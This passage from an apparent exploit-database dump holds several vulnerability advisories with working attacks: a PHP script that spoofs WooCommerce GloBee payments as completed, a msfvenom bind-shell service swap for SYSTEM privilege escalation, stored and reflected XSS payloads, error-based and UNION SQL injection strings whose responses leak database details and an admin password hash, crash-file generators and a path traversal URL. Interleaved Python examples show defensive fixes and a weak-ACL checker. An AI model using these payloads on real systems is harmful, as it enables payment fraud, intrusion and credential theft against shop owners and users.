04 00000000`04a8ec90 00000000`04f18d27 t2k!Java_sun_font_T2KFontScaler_getGlyphImageNative+0x163
05 00000000`04a8ed60 00000000`02a3e1f8 0x4f18d27
06 00000000`04a8ed68 00000000`04a8ee48 0x2a3e1f8
07 00000000`04a8ed70 00000000`5c36dff8 0x4a8ee48
08 00000000`04a8ed78 00000000`00000000 0x5c36dff8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46411.zip
<?php
# Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing]
# Discovery Date: 14.12.2018
# Public Disclosure Date: 14.02.2019
# Exploit Author: GeekHack
# Contact: https://t.me/GeekHack
# Vendor Homepage: https://globee.com/ (previously payb.ee)
# Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1
# Version: <= 1.1.1
# Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1
# CVE: CVE-2018-20782
/*
Description:
Reliance on untrusted inputs (CWE-807), insufficient data verification and the lack of any cryptographic authentication (HMAC etc.) in the IPN callback (the ipn_callback() function in Gateway.php at line 374) allow a remote (even unauthorized) attacker to bypass the payment process and spoof the real order status without actually paying for it.
[code ref: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/blob/8c254d6100ef4cfb3432b219726f4936c1531234/src/Gateway.php#L374]
Actions like 'changing order status' normally require administrative rights. But in this case anyone can perform them, even with the most limited rights, therefore this issue "can" also be considered a Privilege Escalation (CWE-269) vulnerability (but it's not quite right, imho).
*/
if(php_sapi_name() !== 'cli')
die('Use CLI: php '.__FILE__);
if(!extension_loaded('curl'))
die('cURL extension is required');
echo 'Payment Bypass (CVE-2018-20782) PoC by GeekHack team.'."\n";
echo 'Select any product(s) in a vulnerable store and continue checkout through payment via cryptocurrencies (GloBee Payment Gateway).'."\n\n";
$shopURL = rtrim(readline('Shop root URL (https://shop.example.com/): '), '/');
if(strpos(@get_headers($shopURL)[0], '200') === false)
die('Shop url is invalid or not exists (or request was blocked), check link format and try again.');
$paymentLink = readline('Payment link (https://globee.com/en/payment-request/XXXXXXXXXXXXXXXXXXXXXX): ');
if(preg_match('/https:\/\/globee\.com\/en\/payment-request\/(\w*)/', $paymentLink, $matches)) {
$paymentID = $matches[1];
}else{
die('Payment link is invalid, check link format and try again.');
}
$orderID = (int)readline('Order ID: ');
if(!$orderID)
die('Order ID is invalid, must be a positive integer, try again.');
$payload = [ // commented fields are not required for exploitation
'id' => $paymentID,
'status' => 'completed',
//'total' => '123.45',
//'currency' => "USD",
'custom_payment_id' => $orderID,
//'callback_data' => "example data",
/*'customer' => [
'name' => 'John Smit',
'email' => 'john.smit@hotmail.com'
],*/
/*'payment_details' => [
'currency' => 'BTC'
],*/
//'redirect_url' => 'http://globee.com/invoice/'.$paymentID,
//'success_url' => $shopURL,
//'cancel_url' => $shopURL,
//'ipn_url' => $shopURL.'/wc-api/globee_ipn_callback',
//'notification_email' => null,
//'confirmation_speed' => 'medium',
//'expires_at' => '2018-01-25 12:31:04',
//'created_at' => '2018-01-25 12:16:04'
];
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => $shopURL.'/wc-api/globee_ipn_callback',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 2,
CURLOPT_TIMEOUT => 10,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => 'POST',
CURLOPT_POSTFIELDS => json_encode($payload),
CURLOPT_HTTPHEADER => array(
'cache-control: no-cache',
'content-type: application/json',
),
));
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
echo 'cURL Error #: '.$err;
} else {
echo 'Done: '.$response;
}
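The callback above is trusted purely on the strength of being reachable: the posted 'status' becomes the order status, and nothing ties the message to the gateway or to the amount the shop expects. As an added Python example (not the plugin's PHP code and not GloBee's actual API; the shared secret, the signature header, the order store and the field names are constructed for the demonstration), here is that logic beside a hardened callback that authenticates the message with an HMAC, cross-checks it against the shop's own order record, and only allows the expected state transition:

```python
import copy
import hashlib
import hmac
import json

# Constructed shared secret and order store for the demonstration. A real
# gateway issues the webhook secret out of band; the store is the shop database.
WEBHOOK_SECRET = b"constructed-shared-secret"
ORDERS = {
    1042: {"expected_total": "123.45", "currency": "USD", "status": "pending"},
}


def fresh_orders() -> dict:
    return copy.deepcopy(ORDERS)


def sign_ipn(body: bytes, secret: bytes = WEBHOOK_SECRET) -> str:
    """Signature the gateway would attach to the raw body (hypothetical header)."""
    return hmac.new(secret, body, hashlib.sha256).hexdigest()


def ipn_vulnerable(orders: dict, body: bytes) -> str:
    """Before: whatever 'status' the poster sends becomes the order status.
    Nothing proves the request came from the gateway, and nothing checks
    that the reported payment matches the order."""
    data = json.loads(body)
    order = orders[int(data["custom_payment_id"])]
    order["status"] = data["status"]
    return order["status"]


def ipn_hardened(orders: dict, body: bytes, signature: str,
                 secret: bytes = WEBHOOK_SECRET) -> str:
    """After: authenticate the message, then cross-check it against the
    shop's own record of the order before changing any state."""
    # 1. Authenticity: HMAC over the raw body, constant-time comparison.
    expected = sign_ipn(body, secret)
    if not hmac.compare_digest(expected, signature or ""):
        raise PermissionError("IPN signature missing or invalid")
    data = json.loads(body)
    order_id = int(data["custom_payment_id"])
    if order_id not in orders:
        raise KeyError(f"unknown order {order_id}")
    order = orders[order_id]
    # 2. Consistency: the payment must match what the shop expects to be paid.
    if (data.get("total") != order["expected_total"]
            or data.get("currency") != order["currency"]):
        raise ValueError("reported total/currency does not match the order")
    # 3. State machine: only the expected transition, and only once.
    if data.get("status") == "completed" and order["status"] == "pending":
        order["status"] = "completed"
    return order["status"]
```

A complementary control is to ignore the pushed status altogether and fetch the payment by its id from the gateway with the shop's own API credentials, so the status arrives over a channel the shop authenticated rather than from whoever posted to /wc-api/globee_ipn_callback.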
# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation
# Google Dork:
# Date: 2/18/2019
# Exploit Author: Mike Siegel @ml_siegel
# Vendor Homepage: https://maxx.com
# Software Link:
# Version: 1.6.2.0 (May affect other versions)
# Tested on: Win 10 64 bit
# CVE : CVE-2019-15084
MaxxAudio licenses its driver technology to OEMs, and the driver is commonly installed on Dell laptops (and others) as part of other driver installations.
MaxxAudio drivers version 1.6.2.0 install with incorrect file permissions. As a result, a local attacker can escalate to SYSTEM level privileges.
Dell PSIRT has acknowledged the issue and advises updating to a supported driver.
Proof of concept:
1. Validate incorrect permissions.
C:\Users\user> sc qc wavessyssvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: wavessyssvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
ACME\user:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Users\user>
2. Create payload
Create a service payload in msfvenom, transfer to victim:
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe-service -o service.exe
3. Overwrite file.
The file is in use, so it cannot be overwritten directly. However, you can move the file and then replace it.
C:\Users\user> move "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe" "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.bak"
C:\Users\user> copy service.exe "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
4. Reboot the system. Then use netcat or telnet to connect back to 127.0.0.1:4444
C:\WINDOWS\SYSTEM32>whoami
whoami
nt authority\system
Additional information:
This file is embedded in Realtek audio drivers. Dell has since removed this version from their site, but it appears to have been released in January 2017.
The hash is as follows: cbd0c592c59db94d27ad89db2db7432c0c40db69198d9174eb1bb4bd04e12213 *WavesSysSvc64.exe
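The two command outputs in step 1 are enough to detect this class of issue on a fleet without touching the service: a service that starts as LocalSystem whose binary grants write-capable rights to a principal outside the administrative set. As an added Python check (not part of the advisory; the sample text is the advisory's own sc qc and icacls output reproduced as constructed strings, the principal and rights lists are constructed), this parses both outputs and reports every non-administrative ACE that can modify the service binary:

```python
import re

# Principals expected to be able to modify a service binary; anything else
# holding write rights is reported. Constructed list for the demonstration.
ADMIN_PRINCIPALS = {
    r"nt authority\system",
    r"builtin\administrators",
    r"nt service\trustedinstaller",
    "creator owner",
}
# icacls simple and granular right tokens that allow changing the file.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO", "DE"}

# Sample input: the advisory's sc qc / icacls output, embedded as text.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: wavessyssvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Waves Audio Services
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

ICACLS_OUTPUT = r"""
C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Everyone:(I)(F)
                                                    NT AUTHORITY\SYSTEM:(I)(F)
                                                    BUILTIN\Administrators:(I)(F)
                                                    BUILTIN\Users:(I)(RX)
                                                    ACME\user:(I)(F)
                                                    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_sc_qc(text: str) -> dict:
    """Key/value pairs from 'sc qc' output (BINARY_PATH_NAME, SERVICE_START_NAME, ...)."""
    cfg = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and re.fullmatch(r"[A-Z_]{2,}", key.strip()):
            cfg[key.strip()] = value.strip()
    return cfg


def parse_icacls(text: str, path: str) -> list:
    """(principal, [right tokens]) for each ACE in 'icacls <path>' output.
    The first line carries the path before the first ACE; later ones are indented."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if path and line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        principal, sep, rest = line.partition(":(")
        if not sep:
            continue
        tokens = []
        for group in re.findall(r"\(([^)]*)\)", "(" + rest):
            tokens.extend(t.strip() for t in group.split(","))
        aces.append((principal.strip(), tokens))
    return aces


def weak_binary_aces(aces: list) -> list:
    """ACEs granting write-capable rights to anyone outside ADMIN_PRINCIPALS."""
    findings = []
    for principal, tokens in aces:
        writable = sorted(set(tokens) & WRITE_RIGHTS)
        if writable and principal.lower() not in ADMIN_PRINCIPALS:
            findings.append((principal, writable))
    return findings


def assess_service(sc_output: str, icacls_output: str) -> dict:
    """Combine both views: who the service runs as, and who can replace its binary."""
    cfg = parse_sc_qc(sc_output)
    binary = cfg.get("BINARY_PATH_NAME", "").strip('"')
    runs_as = cfg.get("SERVICE_START_NAME", "")
    findings = weak_binary_aces(parse_icacls(icacls_output, binary))
    return {
        "binary": binary,
        "runs_as": runs_as,
        "weak_aces": findings,
        # Exposure needs both halves: a privileged start account and a writable binary.
        "privilege_escalation_risk": bool(findings)
        and runs_as.lower() in {"localsystem", r"nt authority\system"},
    }
```

Note that the check flags ACME\user as well as Everyone: a per-user full-control ACE on a SYSTEM service binary is the same exposure for that user, and it is easy to overlook when only the well-known groups are searched for.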
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting
# Google Dork: N/A
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://zuz.host/
# Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476
# Version: 2.1
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability.
# POC:
----------------------
1. Go to https://[PATH]/contact
2. There are three vulnerable parameters: name, subject and message.
3. Inject the JavaScript code.
4. The injected JavaScript code will be executed when the Administrator opens the malicious message at https://demos.zuz.host/gmusic/admin/inbox.
# Request:
----------------------
POST /gmusic/zuzconsole/___contact HTTP/1.1
Host: server
Connection: close
Content-Length: 155
Accept: application/json, text/plain, */*
Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflate
X-XSS-Protection: 0
{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}
# Response:
----------------------
HTTP/1.1 200 OK
Date: Fri, 15 Feb 2019 01:30:19 GMT
Server: Apache
Connection: close
Content-Type: application/json
Content-Length: 183
{
"kind": "zuz#contactMessageSent",
"etag": "hnwdHsGYwqI6CCSoRSXDMG1BEDTbMMFrOcayLdTYeOs",
"message": "We have recieved your query and will get back to you in 24 hours."
}
# Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection
# Google Dork: inurl:"pages.php?title=privacy-policy"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294
# Demo Website: https://listing-hub.themerig.com
# Version: 1.0
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability.
# POC:
----------------------
1. Access the following path https://[PATH]/pages.php?title=privacy-policy&id=2
2. You can perform an "error-based" SQL Injection using the payload below
2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20-
# Request:
----------------------
GET /pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- HTTP/1.1
Accept-Encoding: gzip, deflate
Host: server
Accept: */*
Connection: close
Cache-Control: no-cache
# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=icrk7uvmqmpsmb4ndt56me8564; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 1149
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 06:16:21 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="eng">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index,follow"><br />
<b>Notice</b>: Undefined index: title in <b>/home2/otomati5/server/includes/head.php</b> on line <b>71</b><br />
<br />
<b>Warning</b>: PDO::query(): SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '::otomati5_hub@localhost::otomati5_hub::10.1.37-MariaDB-cll-lve:' for key 'group_key' in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />
<br />
<b>Fatal error</b>: Call to a member function fetch() on boolean in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />
# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection
# Google Dork: inurl:"assets/external/data.php"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597
# Demo Website: https://themerig.com/find/
# Version: 1.5
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
Find a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability.
# POC:
----------------------
1. Access the following path https://[PATH]/assets/external/data_2.php
2. You can perform a "Generic UNION query" and extract admin credentials by sending a "POST" request using the payload below
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Request:
----------------------
POST /find/assets/external/data_2.php HTTP/1.1
Host: server
Connection: close
Content-Length: 251
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://themerig.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://server/find/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=1sml2ou7o5e379b05l3q0iscq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 227
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 03:09:26 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
{"data":[{"id":null,"category":null,"title":null,"address":null,"latitude":null,"longitude":null,"marker_color":null,"feaured":null,"marker_image":[""],"featured":"admin::4db50f86732e926e59d306cff063d568::themerig@server"}]}
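The two themerig advisories above (pages.php 'id' and data_2.php 'cate') are the same defect: a request parameter is concatenated into the SQL text, so a quote in the input changes the statement, and in the Listing Hub case the database's error message is then echoed into the page. As an added example in Python with an in-memory SQLite database (constructed schema and rows; not the themes' PHP code), here is the string-building query beside a parameterised, type-validated one, plus an error handler that does not leak driver messages:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the CMS 'pages' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (id, title, body) VALUES (?, ?, ?)",
        [(1, "About", "about us"), (2, "Privacy Policy", "policy text")],
    )
    return conn


def fetch_page_vulnerable(conn: sqlite3.Connection, page_id: str):
    """Before: the parameter is pasted into the SQL string. A quote in the
    input becomes part of the statement; here the result is a syntax error,
    which the vulnerable application then prints to the visitor."""
    sql = "SELECT title, body FROM pages WHERE id = '" + page_id + "'"
    return conn.execute(sql).fetchone()


def fetch_page_hardened(conn: sqlite3.Connection, page_id: str):
    """After: validate the type first, then bind the value as a parameter.
    The driver sends it as data, so it can never alter the statement."""
    if not page_id.isdigit():
        raise ValueError("page id must be a positive integer")
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (int(page_id),)
    ).fetchone()


def render_error(exc: Exception, debug: bool = False) -> str:
    """Response text for a failed lookup: driver messages stay in the server
    log (or a debug build), never in the page returned to the client."""
    if debug:
        return f"{type(exc).__name__}: {exc}"
    return "Page not found"
```

The type check is not a substitute for the bound parameter; it simply lets the handler reject bad input with a clean 404 before the database is involved at all.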
#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-17
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: NetSetMan_4.7.1.py
#2.- Open netsetman.txt and copy content to clipboard
#3.- Open NetSetMan
#4.- Enable "Workgroup" and Paste Clipboard
#5.- Click on "Activate"
#6.- Crashed
cod = "\x41" * 100
f = open('netsetman.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: BulletProof FTP Server 2019.0.0.50 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: http://bpftpserver.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.50
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: BulletProof_FTP_Server_2019.0.0.50.py
#2.- Open bullet.txt and copy content to clipboard
#3.- Open BulletProof FTP Server
#4.- Select "Settings" > "SMTP"
#5.- In "Email Server" select "SMTP Server" and Paste Clipboard
#6.- Click on "Test"
#7.- Crashed
cod = "\x41" * 257
f = open('bullet.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed
cod = "\x41" * 256
f = open('valentina.txt', 'w')
f.write(cod)
f.close()
<!--
# Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8925
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value.
2. Proof of Concept
Original request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf
http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini
3. Solution:
The product is discontinued. Update to the latest version of this product.
-->
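As an added illustration (not code from the advisory or from the product), the following Python snippet shows why an absolute schFilePath defeats a naive base-directory join and what check a patched servlet needs. It emulates Windows path semantics with ntpath so it runs on any platform; the base directory is taken from the original request above, and the function names are made up.

```python
import ntpath
from typing import Optional

# Directory the original request above points into; assumed here to be the
# report directory the servlet is meant to serve from.
REPORT_BASE = r"C:\AdventNet\ME\NetFlow\help"


def naive_resolve(sch_file_path: str) -> str:
    """The unsafe pattern: join the base directory with the request parameter.

    ntpath.join() discards the base entirely when the second argument carries
    its own drive and root, so schFilePath=C:\\boot.ini resolves to C:\\boot.ini.
    """
    return ntpath.normpath(ntpath.join(REPORT_BASE, sch_file_path))


def safe_resolve(sch_file_path: str) -> Optional[str]:
    """Hardened variant: refuse absolute paths and anything that escapes the base.

    Returns the canonical path to open, or None when the request must be rejected.
    """
    # Absolute (C:\x, \x) and drive-relative (C:x) inputs are never legitimate
    # for a parameter that should name a file inside REPORT_BASE.
    if ntpath.isabs(sch_file_path) or ntpath.splitdrive(sch_file_path)[0]:
        return None
    candidate = ntpath.normpath(ntpath.join(REPORT_BASE, sch_file_path))
    # Compare case-insensitively and with a trailing separator, so that a
    # sibling such as "help2\x" cannot pass as a prefix match for "help\".
    base = ntpath.normcase(ntpath.normpath(REPORT_BASE)) + ntpath.sep
    if not ntpath.normcase(candidate).startswith(base):
        return None  # '..' sequences walked out of the report directory
    return candidate


if __name__ == "__main__":
    for p in (r"ciscoQoS.pdf", r"C:\boot.ini", r"..\..\..\boot.ini", r"\boot.ini"):
        print(f"{p!r:24} naive -> {naive_resolve(p)!r:44} safe -> {safe_resolve(p)!r}")
```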
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8926
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.
2. Proof of Concept
http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true
Parameters: bussAlert, customDev and selSource
3. Solution:
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8927
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.
2. Proof of Concept
http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=
Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11
3. Solution:
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8928
# Category: webapps
1. Description
